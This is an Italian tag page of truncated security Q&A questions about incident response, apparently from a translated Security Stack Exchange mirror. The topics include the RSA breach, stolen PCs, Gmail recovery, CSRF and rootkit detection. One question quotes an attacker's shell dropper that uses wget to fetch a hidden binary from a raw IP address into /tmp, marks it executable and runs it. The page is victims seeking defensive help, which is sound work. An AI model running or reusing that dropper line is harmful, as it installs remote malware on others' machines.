Domande con tag 'incident-response'

4
risposte

Che cosa dovrei guardare in caso di un importante fornitore che subisce un compromesso con un impatto non specificato?

L'esempio specifico che ho in mente qui è la violazione della RSA nel marzo 2011 dove gli attaccanti hanno ottenuto informazioni critiche che potrebbero essere le informazioni seme utilizzate per generare i numeri pseudo-casuali per i token RS...
posta 08.04.2011 - 13:07
3
risposte

Cosa fa questo sh script se eseguito?

Ho intercettato un attacco al mio server web che ritengo non abbia avuto successo. L'autore dell'attacco ha tentato di eseguire questo script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/...
posta 15.03.2014 - 21:43
2
risposte

Stabilire le routine su cosa fare in caso di furto di un PC

Ho bisogno di stabilire delle routine su come gestire il furto delle apparecchiature del PC, in particolare computer portatili e macchine fisse. Inoltre ho bisogno di capire come minimizzare le conseguenze delle attrezzature rubate. Attualmen...
posta 16.12.2010 - 16:35
4
risposte

Prevenzione e recupero degli account di Gmail

Sto facendo una ricerca su come impedire che il mio account Gmail venga violato e quali sono le opzioni per rivendicarlo. Il numero di telefono associato e l'e-mail di recupero possono essere modificati, infatti mi aspetto che l'hacker li cam...
posta 05.06.2011 - 15:21
4
risposte

Ho incontrato codice di attacco JavaScript: come faccio a cercare informazioni sulle specifiche dell'exploit?

Quindi, ho fatto clic su un invito LinkedIn ragionevolmente cercando, non pensando prima di passare sopra il link, poiché di solito il client di posta elettronica mi avvisa di queste cose. Una volta capito che sono arrivato su una pagina di e...
posta 07.09.2013 - 11:11
5
risposte

I registri del server Web mostrano che qualcuno sta tentando di hackerare il mio sito, cosa devo fare?

Sembra che qualcuno stia tentando di hackerare il mio sito. Quanto segue proviene dai miei file di registro IIS: #Software: Microsoft Internet Information Services 7.5 #Version: 1.0 #Date: 2011-07-03 00:02:39 #Fields: date time s-sitename cs-m...
posta 03.07.2011 - 21:33
3
risposte

Disclosures responsabili e Inquisizione

Molti siti Web come Google, Facebook, ecc. riconoscono i pirati informatici sui loro siti per aver segnalato vulnerabilità alla sicurezza. Ma per il reporter di vulnerabilità è sicuro dal punto di vista legale? Inoltre, come può l'azienda "fidar...
posta 09.05.2013 - 06:29
3
risposte

Come dovrebbe rispondere una pagina web a un attacco CSRF?

So che usi token per prevenire CSRF, ma come dovrebbe rispondere la pagina ricevente quando viene attaccata? Se fallisce silenziosamente, fingere che la transazione abbia avuto successo? Mostra un messaggio di errore? Registra l'attacco? Spie...
posta 28.10.2011 - 07:48
1
risposta

Come incoraggiare la divulgazione responsabile (e reagire in modo appropriato in caso contrario)

Come programmatore coscienzioso, ho posto la sicurezza come uno dei requisiti fondamentali di ogni prodotto che sviluppo. Per prevenire l'introduzione di difetti, promuovo una cultura della consapevolezza (ad esempio, assicurati che i membri del...
posta 19.06.2013 - 13:18
3
risposte

Come verificare manualmente i rootkit su un server

Qualcuno ha un elenco generale passo dopo passo su come provare a rilevare i rootkit su un server Linux o Solaris? Sto cercando di trovare manualmente il rootkit, non con un software automatico. Ad esempio: Luoghi in cui cercare file s...
posta 06.06.2011 - 16:05